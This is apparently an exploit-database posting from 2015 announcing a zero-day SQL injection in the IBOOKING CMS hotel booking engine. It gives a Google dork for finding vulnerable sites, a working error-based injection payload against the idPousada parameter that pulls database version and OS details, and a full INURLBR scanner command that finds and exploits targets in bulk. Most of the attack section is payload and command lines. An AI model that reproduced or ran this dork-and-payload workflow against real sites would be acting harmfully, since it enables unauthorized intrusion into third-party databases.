facebook facebook twitter rss

(0day) IBOOKING CMS - SQL INJECTION

Author: Cleiton Pinheiro , Published: 22-09-2015
# VENTOR:             www.ibooking.com.br
# Vulnerable versions: ALL
# File: filtro_faixa_etaria.php
# Parameter: idPousada(GET)
# DORK: intext:"Desenvolvido por ibooking"
# Reported: 15/10/2015
# ---------------------------------------------------------------------------------
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# EMAIL: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
# ---------------------------------------------------------------------------------

# Description
The vulnerable request is made through a javascript function found within /motor-de-reservas


# Javascript code responsible for vulnerable request

$.ajax({
type: "GET",
url: "filtro_faixa_etaria.php",
data: "qtde_quartos=1&idPousada=61",
success: function(xml){
$("#filtro_faixa_etaria").html(xml);
}
});


# URL Vulnerable:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61

# POC:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)

# Example:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)

# Return print:
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png


# Mass exploration using scanner INURLBR
# Download: https://github.com/googleinurl/SCANNER-INURLBR

# COMMAND
# SETTING DORK DE PESQUISA
--dork 'YOU_DORK'
# USE --dork 'intext:"Desenvolvido por ibooking"'

# SETTING OUTPUT FILE:
# USE -s 'ibooking.txt'

# SETTING STRING EXPLOIT GET:
--exploit-get 'EXPLOIT_GET'
# USE --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'

# SETTING TYPE OF VALIDATION:
# USE -t 3
The third type combine both first and second types: Then, of course, it also establishes connection with the exploit through the get method.
The string get set in parameter --exploit-get It is injected directly in the url:
Exemplo: --exploit-get '/index.php?id=1&file=conect.php'INJEÇÃO URL: http://www.target.br/index.php?id=1&file=conect.php

# SETTING STRING OF VALIDATION:
Specify the string to be used as validation script:
Exemplo: -a {string}
Usando: -a '<title>hello world</title>'
If the specific value is found in the target, it is considered vulnerable.
- USE: -a 'INURLBR_VULN'
The INURLBR_VULN value is passed in hexadecimal format in the exploit-get string

# COMMAND FULL:
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN'

# MORE INFORMATION:
http://blog.inurl.com.br/2015/09/0day-ibooking-cms-injecao-de-sql-e.html


+--------------------------------------------------------------------------------------+
| | | G R 3 3 T S | | |
+--------------------------------------------------------------------------------------+
* r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r, arplhmd, 0x4h4x
* Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra, Eclipse, shaxer
* dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão, IceKiller, c00z
* Oystex, rH, Warflop, se4b3ar , Pablo Verlly Moreira

Like us on Facebook :